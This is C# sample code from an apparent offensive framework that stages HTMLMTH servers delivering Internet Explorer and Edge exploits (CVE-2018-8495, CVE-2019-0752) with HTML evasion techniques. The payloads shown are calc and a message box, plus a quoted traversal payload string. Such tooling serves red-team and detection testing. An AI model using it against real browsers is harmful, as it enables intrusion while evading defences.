/// <summary>
/// Sample showing output merging: builds an attack whose only output is an HTMLMTH
/// server on a virtual host that, per the sample notes, is shared with the HTMLMTH
/// server from Sample6, then generates the server files.
/// </summary>
/// <returns>The generated attack, named "OutputMerging".</returns>
private static IAttack OutputMergingExample()
{
    // The DNS name "HostnameC2" points to the virtual host "VirtualHostC", so the
    // host used here and the one used in Sample6 are the same virtual host (and port).
    string hostName = "HostnameC2";
    string virtualHost = "VirtualHostC";

    // Reuse the Host already known under this DNS name; create it only when the lookup returns null.
    var knownHost = Host.GetHostByHostName(hostName);
    var targetHost = knownHost ?? new Host(virtualHost, hostName, null);

    // The original sample notes "the default port is 80" at this call.
    // NOTE(review): presumably that refers to the HTMLMTH server's own port, not the
    // script-encoding server port, which is set explicitly to 5000 here. Confirm.
    // NOTE(review): the encoder host name looks like a placeholder to be replaced. Confirm.
    var serverOutput = new HtmlmthServerOutput(
        targetHost,
        scriptEncodingServerHost: "SomeWindowsServerRunningTheEncoderScript.com",
        scriptEncodingServerPort: 5000);

    IOutput[] outputs = { serverOutput };
    var attack = new Attack(outputs, name: "OutputMerging");

    // The page pins IE to document mode 8 through the x-ua-compatible meta tag;
    // the encoded_script evasion below only works when IE rendering mode is <= 8.
    string pageHtml = "<html><head><meta http-equiv=\"x-ua-compatible\" content=\"IE=8\"></head><body><script language='VBScript.Encode'>MsgBox Hex(&HBAADF00D)</script></body></html>";
    var website = new OnePageWebsite(pageHtml);

    // Refer to the HTMLMTH documentation and source code for the available evasions.
    // encoded_script requires HTMLMTH's scripting_encoder_server.py to be running on a
    // Windows server that is reachable from the HTMLMTH server.
    string[] evasionNames =
    {
        "htmlmth.evasions.html.encoded_script",
    };

    // Bookkeeping: the website must be registered on the server output before Generate().
    var htmlmthWebsite = new HtmlmthWebsite(website, targetHost, evasionNames);
    serverOutput.Add(htmlmthWebsite);

    attack.Generate();

    // Per the original sample, the files needed to launch the HTMLMTH server should now be at
    // $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server
    // NOTE(review): that path names HostnameB, while this sample uses HostnameC2 on
    // VirtualHostC. Looks like a copy-paste leftover; confirm the real output folder.
    //
    // Merging rules stated by the sample:
    //  - HtmlmthServerOutput instances on the same virtual host and port are merged automatically.
    //  - The same holds for multiple HttpServerOutput, SmbServerOutput and
    //    RemoteFileServerOutput instances on the same virtual host and port.
    //  - Different Output types on the same virtual host and port are NOT merged.
    return attack;
}
/// <summary>
/// Reads the bundled baseline HTML resource from the MyWarez resource directory and
/// wraps it as an <see cref="HtmlmthWebsite"/> that serves it at "/".
/// </summary>
/// <param name="host">Host value passed through to the <see cref="HtmlmthWebsite"/> constructor.</param>
/// <returns>The HTMLMTH website built from the baseline resource.</returns>
/// <remarks>Exceptions thrown by <see cref="File.ReadAllText(string)"/> are not caught here.</remarks>
public static HtmlmthWebsite Create(string host)
{
    // The baseline's payload is not built here; it is hardcoded inside the resource file:
    // Payload = "\..\..\..\..\..\PROGRA~2\INTERN~1\iexplore.exe 0D15EA5E"
    string resourcePath = Path.Join(
        MyWarez.Core.Constants.ResourceDirectory,
        "CVE-2019-0752_internetexplorer.html");
    string html = File.ReadAllText(resourcePath);

    // A single resource, served at the site root.
    var resources = new List<WebsiteResource> { new WebsiteResource(html, "/") };
    var site = new Website(resources);

    return new HtmlmthWebsite(site, host);
}
/// <summary>
/// Sample showing <see cref="HtmlmthServerOutput"/>: builds an attack whose only output
/// is an HTMLMTH server hosting the CVE_2018_8495 website with a list of HTMLMTH
/// evasions applied, then generates the server files.
/// </summary>
/// <returns>The generated attack, named "HtmlmthServerOutput".</returns>
private static IAttack HtmlmthServerOutputExample()
{
    // HostnameB cannot be used here: port 80 on HostnameB is already occupied by the
    // HTTP server from Sample4. "HostnameC1" points to the virtual host "VirtualHostC".
    string hostName = "HostnameC1";
    string virtualHost = "VirtualHostC";

    // Reuse the Host already known under this DNS name; create it only when the lookup returns null.
    var knownHost = Host.GetHostByHostName(hostName);
    var targetHost = knownHost ?? new Host(virtualHost, hostName, null);

    // No port is passed, so the default applies (80, per the original sample comment).
    var serverOutput = new HtmlmthServerOutput(targetHost);

    IOutput[] outputs = { serverOutput };
    var attack = new Attack(outputs, name: "HtmlmthServerOutput");

    // A command line describes a new process to create: image "calc" with no arguments.
    var calcCmdLine = new Tonsil.Processes.CmdLine
    {
        image = "calc",
        arguments = new string[0],
    };
    var calcProcess = new Tonsil.Processes.Process(calcCmdLine);

    // The sample notes that this website type enforces a ProcessList of exactly one entry.
    var processes = new ProcessList(new[] { calcProcess });
    var exploitWebsite = new CVE_2018_8495(processes);

    // HTMLMTH evasion identifiers applied when the content is delivered. Refer to the
    // HTMLMTH documentation and source code for the available evasions.
    string[] evasionNames =
    {
        "htmlmth.evasions.html.entity_encoding_attributes_dec",
        "htmlmth.evasions.html.external_resource_internal_script",
        "htmlmth.evasions.html.insert_slash_after_opening_tag_names",
        "htmlmth.evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be",
    };

    // HtmlmthWebsite represents the HTTP resource(s) hosted by the HTMLMTH server.
    // Bookkeeping: it must be registered on the server output before Generate().
    var exploitHtmlmthWebsite = new HtmlmthWebsite(exploitWebsite, targetHost, evasionNames);
    serverOutput.Add(exploitHtmlmthWebsite);

    attack.Generate();

    // Per the original sample, the files needed to launch the HTMLMTH server should now be at
    // $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server
    // NOTE(review): that path names HostnameB, which this sample explicitly avoids in
    // favour of HostnameC1. Looks like a copy-paste leftover; confirm the real output folder.
    return attack;
}